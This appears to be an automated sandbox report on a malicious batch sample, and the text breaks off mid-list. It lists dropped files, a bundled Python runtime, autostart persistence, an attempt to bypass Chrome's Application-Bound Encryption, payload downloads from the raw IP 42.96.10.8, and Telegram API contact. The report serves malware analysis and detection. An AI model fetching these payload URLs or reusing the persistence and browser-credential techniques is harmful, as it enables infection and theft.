chrome.exe 45->64         started        process10 dnsIp11 84 C:\Users\user\AppData\...\servicemanager.pyd, PE32 47->84 dropped 86 C:\Users\user\AppData\...\pythonservice.exe, PE32 47->86 dropped 88 C:\Users\user\AppData\...\perfmondata.dll, PE32 47->88 dropped 92 601 other files (68 malicious) 47->92 dropped 100 42.96.10.8, 49733, 80 LILLY-ASUS Viet Nam 50->100 122 Powershell creates an autostart link 50->122 124 Powershell drops PE file 50->124 68 synaptics.exe 254 54->68         started        102 ntp.msn.com 56->102 90 C:\Users\user\AppData\...\WindowsSecurity.lnk, MS 66->90 dropped 126 Creates an autostart registry key pointing to binary in C:\Windows 66->126 file12 signatures13 process14 dnsIp15 104 127.0.0.1 unknown unknown 68->104 128 Attempt to bypass Chrome Application-Bound Encryption 68->128 72 chrome.exe 68->72         started        75 taskkill.exe 68->75         started        signatures16 process17 dnsIp18 106 239.255.255.250 unknown Reserved 72->106 77 chrome.exe 72->77         started        80 conhost.exe 75->80         started        process19 dnsIp20 110 www.google.com 142.250.184.228 GOOGLEUS United States 77->110

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                x.bat0%ReversingLabs
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_asyncio.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_bz2.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_ctypes.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_ctypes_test.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_decimal.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_elementtree.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_hashlib.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_lzma.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_msi.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_multiprocessing.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_overlapped.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_queue.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_socket.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_sqlite3.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_ssl.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testbuffer.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testcapi.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testconsole.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testimportmultiple.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testinternalcapi.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testmultiphase.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_tkinter.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_uuid.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_zoneinfo.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\libcrypto-1_1.dll0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\libffi-7.dll0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\libssl-1_1.dll0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\pyexpat.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\select.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\sqlite3.dll0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\tcl86t.dll2%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\tk86t.dll0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\unicodedata.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\winsound.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\abc.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\aifc.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\argparse.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ast.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asynchat.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\base_events.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\base_futures.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\base_subprocess.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\base_tasks.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\coroutines.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\events.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\exceptions.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\format_helpers.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\futures.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\locks.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\log.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\mixins.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\proactor_events.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\protocols.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\queues.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\runners.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\selector_events.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\sslproto.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\staggered.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\streams.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\subprocess.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\tasks.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\threads.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\transports.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\trsock.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\unix_events.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\windows_events.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\asyncio\windows_utils.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\__init__.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\_aix.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\_endian.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\__init__.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\__main__.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_numbers.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_objects.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_parameters.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_pep3118.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_pickling.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_pointers.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_prototypes.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_python_api.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_random_things.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_refcounts.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_repr.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_returnfuncptrs.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_simplesubclasses.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_sizes.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_slicing.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_stringptr.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_strings.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_struct_fields.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_structures.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_unaligned_structures.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_unicode.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_values.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_varsize_struct.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_win32.py0%ReversingLabs
                C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\test\test_wintypes.py0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://bugs.python.org/issue5845#msg1986360%Avira URL Cloudsafe
                https://bugs.python.org/issue201640%Avira URL Cloudsafe
                https://bugs.python.org/msg3523810%Avira URL Cloudsafe
                https://github.coN0%Avira URL Cloudsafe
                https://github.coNN0%Avira URL Cloudsafe
                https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN)0%Avira URL Cloudsafe
                http://42.96.10.8/envxfix.zip0%Avira URL Cloudsafe
                https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyz0%Avira URL Cloudsafe
                https://bugs.python.org/issue396820%Avira URL Cloudsafe
                http://bugs.python.org/issue196190%Avira URL Cloudsafe
                http://code.activestate.com/recipes/259174/0%Avira URL Cloudsafe
                https://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/0%Avira URL Cloudsafe
                http://42.96.10.8/SCAN_9000%Avira URL Cloudsafe
                http://bugs.python.org/issue16298)0%Avira URL Cloudsafe
                https://urllib3.readthedocs.io/en/latest/advanced-usage.html0%Avira URL Cloudsafe
                https://foss.heptapod.net/pypy/pypy/-/issues/31290%Avira URL Cloudsafe
                http://hg.python.org/cpython/file/7aaba721ebc0/Lib/socket.py#l2520%Avira URL Cloudsafe
                http://www.pkware.com/documents/casestudies/APPNOTE.TXT0%Avira URL Cloudsafe
                http://www.demo2s.com/Tutorial/Cpp/0380__set-multiset/Catalog0380__set-multiset.htm0%Avira URL Cloudsafe
                https://bugs.python.org/issue295850%Avira URL Cloudsafe
                http://domain.tld/path/to/resource0%Avira URL Cloudsafe
                http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap04.html#tag_04_110%Avira URL Cloudsafe
                http://code.activestate.com/recipes/577573-compare-algorithms-for-heapqsmallest0%Avira URL Cloudsafe
                http://42.96.10.8/VOINE_BU0%Avira URL Cloudsafe
                https://bugs.python.org/issue316720%Avira URL Cloudsafe
                http://bugs.python.org/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                chrome.cloudflare-dns.com
                162.159.61.3
                truefalse
                  high
                  plus.l.google.com
                  142.250.181.238
                  truefalse
                    high
                    play.google.com
                    172.217.18.14
                    truefalse
                      high
                      www.google.com
                      142.250.184.228
                      truefalse
                        high
                        ip-api.com
                        208.95.112.1
                        truefalse
                          high
                          api.telegram.org
                          149.154.167.220
                          truefalse
                            high
                            ntp.msn.com
                            unknown
                            unknownfalse
                              high
                              apis.google.com
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                  high
                                  http://ip-api.com/json/?fields=8195false
                                    high
                                    http://42.96.10.8/envxfix.ziptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://42.96.10.8/SCAN_900true
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.google.com/async/newtab_promosfalse
                                      high
                                      https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                        high
                                        http://42.96.10.8/VOINE_BUtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://github.com/urllib3/urllib3/issues/2168z(Andreysynaptics.exe, 00000014.00000003.2594774367.0000000000AD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN)synaptics.exe, 00000014.00000003.2619913019.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621884568.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2622302076.0000000001552000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://bugs.python.org/issue39682synaptics.exe, 00000014.00000003.2639516326.00000000018F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://python.org/dev/peps/pep-0263/synaptics.exefalse
                                            high
                                            https://tools.ietf.org/html/rfc2388#section-4.4synaptics.exe, 00000014.00000003.2652617065.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635897530.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2626064254.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635768503.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2659715215.0000000000B56000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2742061088.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2646681174.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2681756928.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2672930458.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2626188130.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2631317671.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2668430759.0000000000B56000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://web.archive.org/web/20200623061726/https://bitbucket.org/pitrou/pathlib/issues/12/synaptics.exe, 00000014.00000003.2639516326.00000000018F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://github.com/python/cpython/issues/113199synaptics.exe, 00000014.00000003.2625802641.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627821618.00000000016CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://bugs.python.org/issue19619synaptics.exe, 00000014.00000003.2491091392.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2494776708.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2491869638.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2494231555.0000000000AC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://github.com/urllib3/urllib3/pull/2624synaptics.exe, 00000014.00000003.2627821618.00000000016CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://bugs.python.org/issue5845#msg198636synaptics.exe, 00000014.00000003.2495528030.0000000000AF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963synaptics.exe, 00000014.00000003.2604902881.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2613750411.00000000037EE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2606267033.0000000000C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://github.com/psf/requests/issues/1084synaptics.exe, 00000014.00000003.2749100998.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://curl.haxx.se/rfc/cookie_spec.htmlsynaptics.exe, 00000014.00000003.2705504110.000000000198D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2712422973.0000000001544000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2717288570.00000000019BA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2713378866.0000000001A5D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2742061088.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2703493115.00000000015E7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2706037061.0000000001544000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2713378866.0000000001A66000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2710404089.000000000198D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2711655946.000000000196D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2711655946.000000000198D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://bugs.python.org/msg352381synaptics.exe, 00000014.00000003.2539955000.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2538852735.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541660625.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://github.com/pyca/pyopenssl/pull/933synaptics.exe, 00000014.00000003.2635460512.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2631052256.00000000016CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://bugs.python.org/issue20164synaptics.exe, 00000014.00000003.2740898219.0000000001A63000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2737936143.0000000001535000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://httpbin.org/getsynaptics.exe, 00000014.00000003.2749100998.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://github.com/psf/requests/issues/3490synaptics.exe, 00000014.00000003.2749100998.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://foo.com/synaptics.exe, 00000014.00000003.2522185220.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521705693.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2523194707.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2522322435.0000000000ADD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://github.coNNsynaptics.exe, 00000014.00000003.2690368319.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2699376646.00000000018F7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2699907714.0000000001907000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://httpbin.org/synaptics.exe, 00000014.00000003.2684280852.00000000016CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyzsynaptics.exe, 00000014.00000003.2631388045.0000000000AF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlsynaptics.exe, 00000014.00000003.2539955000.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541956815.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541826132.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2538852735.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2539569161.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541660625.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://github.com/urllib3/urllib3/issues/3267.synaptics.exe, 00000014.00000003.2631052256.00000000016CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://sourceware.org/pthreads-win32/manual/pthread_barrier_init.htmlsynaptics.exe, 00000014.00000003.2631606979.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2601056030.000000000192A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627071554.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2609858470.0000000001936000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2599185163.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2618104210.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2623557464.0000000001934000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://github.com/python/cpython/pull/7160#discussion_r195405230synaptics.exe, 00000014.00000003.2558095690.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2563295626.0000000000B8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://gist.github.com/4325783synaptics.exe, 00000014.00000003.2533406112.0000000000B86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535synaptics.exe, 00000014.00000003.2675863176.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2689040173.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2672783950.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2619061825.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2625802641.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2604902881.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2749852140.0000000000B86000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2665807066.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2678476168.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621521060.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2738994032.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2745492829.0000000000B86000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2619417962.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2749100998.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684561105.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://tools.ietf.org/html/rfc3986#appendix-Asynaptics.exe, 00000014.00000003.2522185220.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521705693.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2523194707.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2522322435.0000000000ADD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.python.org/psf/license/synaptics.exe, 00000014.00000003.2495528030.0000000000AF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://github.com/pypa/setuptools/issues/417#issuecomment-392298401synaptics.exe, 00000014.00000003.2500295004.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2501737363.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2502366395.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2500387441.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2507985486.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2502283168.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2500204082.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2509836397.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://docs.python.org/3.3/howto/logging.html#configuring-logging-for-a-librarysynaptics.exe, 00000014.00000003.2687202668.000000000154E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://foo.com:/synaptics.exe, 00000014.00000003.2522185220.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521705693.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2523194707.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2522322435.0000000000ADD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://wwwsearch.sf.net/):synaptics.exe, 00000014.00000003.2705504110.000000000198D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2712422973.0000000001544000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2730254084.000000000190E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2717288570.00000000019BA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2713378866.0000000001A5D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2742061088.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2740898219.0000000001A5D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2718070490.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2703493115.00000000015E7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2725817031.000000000190D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2706037061.0000000001544000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2713378866.0000000001A66000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 